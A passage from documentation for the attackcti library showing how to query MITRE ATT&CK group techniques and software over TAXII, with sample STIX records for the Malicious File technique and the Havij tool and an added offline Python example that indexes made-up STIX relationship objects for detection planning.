Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ', x_mitre_is_subtechnique=True, x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')

Get Techniques Used by Group (TAXII)

If you do not provide the name of a specific Group (case sensitive), the function returns information about all the groups available across all the matrices.

groups = lift.get_groups()
one_group = groups[0]
group_techniques = lift.get_techniques_used_by_group(one_group)
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-11T14:49:36.954Z', modified='2020-03-11T14:55:56.177Z', name='Malicious File', description="An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1204/002', external_id='T1204.002')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Process: Process Creation', 'File: File Creation'], x_mitre_detection="Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. 
This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')

Get Software Used by Group (TAXII)

You can retrieve every software (malware or tool) mapped to a specific Group STIX object.

groups = lift.get_groups()
one_group = groups[0]
group_software = lift.get_software_used_by_group(one_group)
group_software[0]
Tool(type='tool', id='tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2018-04-18T17:59:24.739Z', modified='2018-10-17T00:14:20.652Z', name='Havij', description='[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)', labels=['tool'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0224', external_id='S0224'), ExternalReference(source_name='Check Point Havij Analysis', description='Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.', url='https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['Havij'], x_mitre_platforms=['Linux', 'Windows', 'macOS'], x_mitre_version='1.0')
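The helpers used from "Get Any Group by Alias" through "Get Software Used by Group" above all rest on the same data: STIX `relationship` objects whose `source_ref` points at a group, software or mitigation and whose `target_ref` points at what it `uses` or `mitigates`. The block below is an added example, not the attackcti library's own implementation, that rebuilds those joins over a constructed in-memory bundle so the logic can be inspected and tested offline. It also adds a case-insensitive alias index, because get_group_by_alias() is case sensitive. All object IDs (`intrusion-set--g1`, `tool--s1`, ...) and names are made up and do not correspond to real ATT&CK objects; the dicts mimic the Mapping interface of the stix2 objects attack_client returns.

```python
# Added example (not part of attackcti): resolve ATT&CK 'uses' / 'mitigates'
# relationships offline over a constructed STIX-like bundle. IDs are made up.
from collections import defaultdict

SAMPLE_OBJECTS = [
    {"type": "intrusion-set", "id": "intrusion-set--g1", "name": "Sample Group",
     "aliases": ["Sample Group", "Cozy Sample", "SAMPLEDUKE"]},
    {"type": "tool", "id": "tool--s1", "name": "Sample Tool"},
    {"type": "malware", "id": "malware--s2", "name": "Sample Malware"},
    {"type": "attack-pattern", "id": "attack-pattern--t1", "name": "Web Protocols"},
    {"type": "attack-pattern", "id": "attack-pattern--t2", "name": "Malicious File"},
    {"type": "attack-pattern", "id": "attack-pattern--t3", "name": "Rundll32"},
    {"type": "course-of-action", "id": "course-of-action--m1", "name": "User Training"},
    # group -> tool, group -> technique, tool -> technique, malware -> technique,
    # mitigation -> technique
    {"type": "relationship", "id": "relationship--r1", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "tool--s1"},
    {"type": "relationship", "id": "relationship--r2", "relationship_type": "uses",
     "source_ref": "intrusion-set--g1", "target_ref": "attack-pattern--t2"},
    {"type": "relationship", "id": "relationship--r3", "relationship_type": "uses",
     "source_ref": "tool--s1", "target_ref": "attack-pattern--t1"},
    {"type": "relationship", "id": "relationship--r4", "relationship_type": "uses",
     "source_ref": "malware--s2", "target_ref": "attack-pattern--t3"},
    {"type": "relationship", "id": "relationship--r5", "relationship_type": "mitigates",
     "source_ref": "course-of-action--m1", "target_ref": "attack-pattern--t2"},
]


class AttackIndex:
    """In-memory index over a bundle: objects by id, relationships by
    source_ref and target_ref, and a case-insensitive alias table for groups."""

    def __init__(self, objects):
        self.by_id = {o["id"]: o for o in objects if o["type"] != "relationship"}
        self.outgoing = defaultdict(list)   # source_ref -> [relationship, ...]
        self.incoming = defaultdict(list)   # target_ref -> [relationship, ...]
        for o in objects:
            if o["type"] == "relationship":
                self.outgoing[o["source_ref"]].append(o)
                self.incoming[o["target_ref"]].append(o)
        self.alias = {}
        for o in self.by_id.values():
            if o["type"] == "intrusion-set":
                for name in o.get("aliases", []) + [o["name"]]:
                    self.alias[name.lower()] = o

    def group_by_alias(self, alias):
        """Case-insensitive alias lookup; returns None when no group matches."""
        return self.alias.get(alias.lower())

    def relationships_by_object(self, obj, rel_type=None):
        """All relationships in which obj is source or target, optionally
        restricted to one relationship_type ('uses' or 'mitigates')."""
        rels = self.outgoing.get(obj["id"], []) + self.incoming.get(obj["id"], [])
        return [r for r in rels if rel_type is None or r["relationship_type"] == rel_type]

    def targets(self, obj, rel_type, target_types):
        """Objects reached from obj via rel_type whose STIX type is in target_types.
        Dangling target_refs (object not in the bundle) are skipped."""
        out = []
        for r in self.outgoing.get(obj["id"], []):
            tgt = self.by_id.get(r["target_ref"])
            if r["relationship_type"] == rel_type and tgt and tgt["type"] in target_types:
                out.append(tgt)
        return out

    def software_used_by_group(self, group):
        return self.targets(group, "uses", {"tool", "malware"})

    def techniques_used_by_group(self, group, include_software=True):
        """Techniques the group uses directly plus, by default, techniques used
        by the group's software; de-duplicated by id."""
        techs = {t["id"]: t for t in self.targets(group, "uses", {"attack-pattern"})}
        if include_software:
            for sw in self.software_used_by_group(group):
                for t in self.targets(sw, "uses", {"attack-pattern"}):
                    techs.setdefault(t["id"], t)
        return list(techs.values())

    def techniques_with_mitigations(self):
        """Techniques that are the target of at least one 'mitigates' edge."""
        return [self.by_id[tid] for tid, rels in self.incoming.items()
                if tid in self.by_id and self.by_id[tid]["type"] == "attack-pattern"
                and any(r["relationship_type"] == "mitigates" for r in rels)]


if __name__ == "__main__":
    idx = AttackIndex(SAMPLE_OBJECTS)
    g = idx.group_by_alias("cozy sample")
    print([t["name"] for t in idx.techniques_used_by_group(g)])
    print([s["name"] for s in idx.software_used_by_group(g)])
    print([t["name"] for t in idx.techniques_with_mitigations()])
```

The `include_software` switch matters when building a detection backlog for a group: a group's direct technique mappings are usually a subset of what its tooling can do, so the inherited set is the one to compare against your coverage. Feeding the real feed in is a matter of passing `lift.get_stix_objects()` output (or the group, software, technique and relationship lists concatenated) to AttackIndex.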